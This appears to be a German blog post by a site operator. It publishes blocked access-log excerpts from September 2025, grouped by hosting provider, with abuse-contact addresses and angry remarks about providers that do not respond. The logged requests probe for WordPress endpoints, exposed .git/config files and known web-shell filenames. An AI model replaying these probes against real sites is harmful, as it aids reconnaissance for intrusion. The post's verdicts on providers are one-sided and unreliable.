47.251.15.21 website*x.com – – [14/Sep/2025:20:18:31 +0200] „GET /Public/home/js/check.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
47.251.14.232 website*x.com – – [14/Sep/2025:20:18:31 +0200] „GET /static/admin/javascript/hetong.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
+
47.88.90.156 website*x.com – – [14/Sep/2025:20:18:32 +0200] „GET /Public/home/js/check.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
47.88.94.161 www.website*x.com – – [14/Sep/2025:20:18:34 +0200] „GET /Public/home/js/check.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
+
47.254.74.59 www.website*x.com – – [14/Sep/2025:20:18:41 +0200] „GET /Public/home/js/check.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
+
47.88.90.156 www.website*x.com – – [14/Sep/2025:20:18:46 +0200] „GET /Public/home/js/check.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
+
47.254.25.10 website*x.com – – [14/Sep/2025:20:18:48 +0200] „GET /Public/home/js/check.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
+
47.88.78.6 website*x.com – – [14/Sep/2025:20:18:49 +0200] „GET /static/admin/javascript/hetong.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
47.88.78.6 www.website*x.com – – [14/Sep/2025:20:18:51 +0200] „GET /Public/home/js/check.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
47.88.6.178 www.website*x.com – – [14/Sep/2025:20:18:52 +0200] „GET /static/admin/javascript/hetong.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
47.88.5.56 www.website*x.com – – [14/Sep/2025:20:18:53 +0200] „GET /static/admin/javascript/hetong.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
47.88.94.28 www.website*x.com – – [14/Sep/2025:20:18:53 +0200] „GET /static/admin/javascript/hetong.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
+
47.251.14.232 website*x.com – – [14/Sep/2025:20:18:55 +0200] „GET /static/admin/javascript/hetong.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
+
47.88.86.63 www.website*x.com – – [14/Sep/2025:20:19:02 +0200] „GET /static/admin/javascript/hetong.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
47.88.94.161 website*x.com – – [14/Sep/2025:20:19:07 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
+
47.254.74.59 website*x.com – – [14/Sep/2025:20:19:20 +0200] „GET /Public/home/js/check.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
+
47.88.94.161 website*x.com – – [14/Sep/2025:20:19:23 +0200] „GET /Public/home/js/check.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
47.254.74.59 www.website*x.com – – [14/Sep/2025:20:19:27 +0200] „GET /Public/home/js/check.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
47.254.74.59 website*x.com – – [14/Sep/2025:20:19:30 +0200] „GET /static/admin/javascript/hetong.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
47.254.85.182 www.website*x.com – – [14/Sep/2025:20:19:32 +0200] „GET /static/admin/javascript/hetong.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
+
47.88.5.56 www.website*x.com – – [14/Sep/2025:20:19:35 +0200] „GET /Public/home/js/check.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
47.88.94.28 website*x.com – – [14/Sep/2025:20:19:36 +0200] „GET /Public/home/js/check.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
+
47.251.14.232 website*x.com – – [14/Sep/2025:20:19:44 +0200] „GET /static/admin/javascript/hetong.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
+
47.88.101.3 website*x.com – – [14/Sep/2025:20:19:45 +0200] „GET /Public/home/js/check.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
47.88.94.159 www.website*x.com – – [14/Sep/2025:20:19:46 +0200] „GET /static/admin/javascript/hetong.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
47.88.90.156 website*x.com – – [14/Sep/2025:20:19:54 +0200] „GET /static/admin/javascript/hetong.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“
+
47.254.16.187 website*x.com – – [14/Sep/2025:20:20:02 +0200] „GET /static/admin/javascript/hetong.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36“

MAIL NR. 20 SONNTAG

olatunji822@outlook.com,info@smartlink-isp.com

AS215930 – CIPHER OPERATIONS DOO BEOGRAD – NOVI BEOGRAD – NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
62.60.130.210 website*x.com – – [14/Sep/2025:20:57:11 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://twitter.com/“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0“
62.60.130.210 website*x.com – – [14/Sep/2025:20:57:16 +0200] „GET /administrator/ HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15“
62.60.130.210 website*x.com – – [14/Sep/2025:20:57:21 +0200] „GET / HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15) Gecko/20100101 Firefox/122.0“

AS210413 – Smart Link Company for Internet Service – AGAIN AND AGAIN!!! – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
45.157.54.21 website*x.com – – [15/Sep/2025:00:00:11 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
45.157.54.21 website*x.com – – [15/Sep/2025:00:00:11 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

JETZT schauen wir mal, welche Provider nun verantwortungsvoll reagieren, antworten und die Hacker-Idioten stoppen!!!

PROTOKOLL-AUSZÜGE – ABUSE-MELDUNGEN vom FREITAG, 05 SEPTEMBER 25 BIS SONNTAG 07 SEPTEMBER 25!

Am Wochenende mal wieder unzählige dumme Hacking-Versuche, beginnend vom Freitag-Nachmittag bis Sonntag. Es sind ja nur ein paar Auszüge, dessen Abuse-Mails MIT ENTSPRECHENDER BEMERKUNG and die MIT VERANTWORTLICHEN PROVIDER heute am Montag nun rausgehen.

Leider reagieren zu viele Provider absolut nicht, mit dieser UNTÄTIGKEIT mutieren solche Provider immer mehr zum SUPPORTER FÜR DIESE DUMMEN HACKER-IDIOTEN!

Verantwortungsvolle Provider schliessen diese SICHERHEITSLÜCKEN in den entsprechenden Websites/Server nach unserer Meldung unverzüglich!

Hier nun ein paar Auszüge. Sehr amüsant auch hier mal wieder, es wird trotz einem 403 immer und immer wieder über die gleichen IP´S versucht:

AB FREITAG-NACHMITTAG

MAIL NR. 1 FRIDAY!

info@fasthosting.net.za,abuse@amazonaws.com, trustandsafety@support.aws.com,abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com

AS211138 – Private-Hosting di Cipriano oscar – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
info@fasthosting.net.za – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
41.216.188.242 website*x.com – – [05/Sep/2025:16:02:33 +0200] „GET /wp-f.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36“

AS16509 – Amazon.com, Inc. – VERY GOOD PROVIDER! – ALWAYS STOPS THE HACKER-IDIOTS AFTER ABUSE-MAIL FROM US!
trustandsafety@support.aws.com – ALWAYS ANSWERED ABOUT OUR ABUSE EMAILS! THIS IS VERY GOOD!
54.255.218.77 website*x.com – – [05/Sep/2025:17:03:46 +0200] „GET /wp-content/plugins/aafr/uploader.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
54.255.218.77 website*x.com – – [05/Sep/2025:17:04:21 +0200] „GET /wp-content/plugins/elex/elex.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
54.255.218.77 website*x.com – – [05/Sep/2025:17:04:35 +0200] „GET /wp-content/plugins/yanierin/akcc.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
54.255.218.77 website*x.com – – [05/Sep/2025:17:04:54 +0200] „GET /mass.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
54.255.218.77 website*x.com – – [05/Sep/2025:17:05:06 +0200] „GET /plugins/kontol/wp-crom.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
54.255.218.77 website*x.com – – [05/Sep/2025:17:05:25 +0200] „GET /wp-content/plugins/view-source/ioxi-o2.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
54.255.218.77 website*x.com – – [05/Sep/2025:17:05:44 +0200] „GET /wp-content/plugins/index-path.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
54.255.218.77 website*x.com – – [05/Sep/2025:17:05:55 +0200] „GET /wp-content/themes/pridmag/db.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

MAIL NR. 2 FRIDAY!

abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com,abuse@virtualine.org,

AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
HERE THIS UNSECURE PROVIDER WITH 2 IP´S!
20.68.252.105 website*x.com – – [05/Sep/2025:21:01:45 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
20.68.252.105 website*x.com – – [05/Sep/2025:21:01:45 +0200] „GET /wp-includes/ID3/license.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
20.68.252.105 website*x.com – – [05/Sep/2025:21:01:45 +0200] „GET /feed/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
20.68.252.105 website*x.com – – [05/Sep/2025:21:01:45 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
20.68.252.105 website*x.com – – [05/Sep/2025:21:01:45 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
20.68.252.105 website*x.com – – [05/Sep/2025:21:01:45 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
20.68.252.105 website*x.com – – [05/Sep/2025:21:01:45 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
20.68.252.105 website*x.com – – [05/Sep/2025:21:01:45 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
20.68.252.105 website*x.com – – [05/Sep/2025:21:01:45 +0200] „GET /2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
20.68.252.105 website*x.com – – [05/Sep/2025:21:01:45 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
20.68.252.105 website*x.com – – [05/Sep/2025:21:01:45 +0200] „GET /2021/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
20.68.252.105 website*x.com – – [05/Sep/2025:21:01:45 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
20.68.252.105 website*x.com – – [05/Sep/2025:21:01:45 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
20.68.252.105 website*x.com – – [05/Sep/2025:21:01:45 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
20.68.252.105 website*x.com – – [05/Sep/2025:21:01:45 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
20.68.252.105 website*x.com – – [05/Sep/2025:21:01:45 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
+
20.39.200.85 website*x.com – – [06/Sep/2025:01:20:38 +0200] „GET /WSO.php HTTP/1.0“ 302 – „-“ „-“
20.39.200.85 website*x.com – – [06/Sep/2025:01:20:40 +0200] „GET /a.php HTTP/1.0“ 302 – „-“ „-“
20.39.200.85 website*x.com – – [06/Sep/2025:01:20:41 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „-“
20.39.200.85 website*x.com – – [06/Sep/2025:01:20:41 +0200] „GET /aaa.php HTTP/1.0“ 302 – „-“ „-“
20.39.200.85 website*x.com – – [06/Sep/2025:01:20:42 +0200] „GET /ab.php HTTP/1.0“ 302 – „-“ „-“
20.39.200.85 website*x.com – – [06/Sep/2025:01:20:43 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
20.39.200.85 website*x.com – – [06/Sep/2025:01:20:43 +0200] „GET /anonse/lock360.php HTTP/1.0“ 403 – „-“ „-“
20.39.200.85 website*x.com – – [06/Sep/2025:01:20:43 +0200] „GET /file5.php HTTP/1.0“ 302 – „-“ „-“
20.39.200.85 website*x.com – – [06/Sep/2025:01:20:44 +0200] „GET /sitemaps.php HTTP/1.0“ 302 – „-“ „-“
20.39.200.85 website*x.com – – [06/Sep/2025:01:20:45 +0200] „GET /ioxi-o.php HTTP/1.0“ 302 – „-“ „-“
20.39.200.85 website*x.com – – [06/Sep/2025:01:20:45 +0200] „GET /load.php HTTP/1.0“ 302 – „-“ „-“
20.39.200.85 website*x.com – – [06/Sep/2025:01:20:46 +0200] „GET /k.php HTTP/1.0“ 302 – „-“ „-“
20.39.200.85 website*x.com – – [06/Sep/2025:01:20:46 +0200] „GET /autoload_classmap.php HTTP/1.0“ 302 – „-“ „-“
20.39.200.85 website*x.com – – [06/Sep/2025:01:20:47 +0200] „GET /post.php HTTP/1.0“ 302 – „-“ „-“
20.39.200.85 website*x.com – – [06/Sep/2025:01:20:48 +0200] „GET /1.php HTTP/1.0“ 302 – „-“ „-“
20.39.200.85 website*x.com – – [06/Sep/2025:01:20:48 +0200] „GET /flower.php HTTP/1.0“ 302 – „-“ „-“
20.39.200.85 website*x.com – – [06/Sep/2025:01:20:49 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „-“
… and so on… and so on!!!

AS214940 – KPROHOST LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@virtualine.org – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
198.55.98.93 website*x.com – – [05/Sep/2025:21:52:11 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 8.1.0; SM-G610M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36“

SAMSTAG

MAIL NR. 1 SATURDAY

abuse@virtualine.org,abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com,abuse@vdsina.com

AS214940 – KPROHOST LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@virtualine.org – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
198.55.98.253 website*x.com – – [06/Sep/2025:01:55:07 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3724.8 Safari/537.36“

AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
HERE THIS UNSECURE PROVIDER WITH 2 IP´S!
4.223.174.255 website*x.com – – [06/Sep/2025:04:23:48 +0200] „GET /.alf.php HTTP/1.0“ 403 – „-“ „-“
4.223.174.255 website*x.com – – [06/Sep/2025:04:23:48 +0200] „GET /.bod/.ll/ss.php HTTP/1.0“ 403 – „-“ „-“
4.223.174.255 website*x.com – – [06/Sep/2025:04:23:48 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „-“
+
4.217.168.213 website*x.com – – [06/Sep/2025:06:01:55 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
4.217.168.213 website*x.com – – [06/Sep/2025:06:01:56 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
4.217.168.213 website*x.com – – [06/Sep/2025:06:01:56 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
4.217.168.213 website*x.com – – [06/Sep/2025:06:01:57 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
4.217.168.213 website*x.com – – [06/Sep/2025:06:02:01 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
4.217.168.213 website*x.com – – [06/Sep/2025:06:02:02 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
4.217.168.213 website*x.com – – [06/Sep/2025:06:02:02 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
4.217.168.213 website*x.com – – [06/Sep/2025:06:02:02 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
4.217.168.213 website*x.com – – [06/Sep/2025:06:02:03 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
4.217.168.213 website*x.com – – [06/Sep/2025:06:02:04 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“

AS216071 – SERVERS TECH FZCO – VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@vdsina.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
146.103.126.105 website*x.com – – [06/Sep/2025:07:05:57 +0200] „GET /wp-content/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:05:58 +0200] „GET /wp-includes/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:05:58 +0200] „GET /wp-admin/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:05:58 +0200] „GET /wp-content/uploads/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:05:59 +0200] „GET /wp-content/uploads/2025/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:05:59 +0200] „GET /wp-content/uploads/2024/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:05:59 +0200] „GET /wp-content/uploads/2023/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
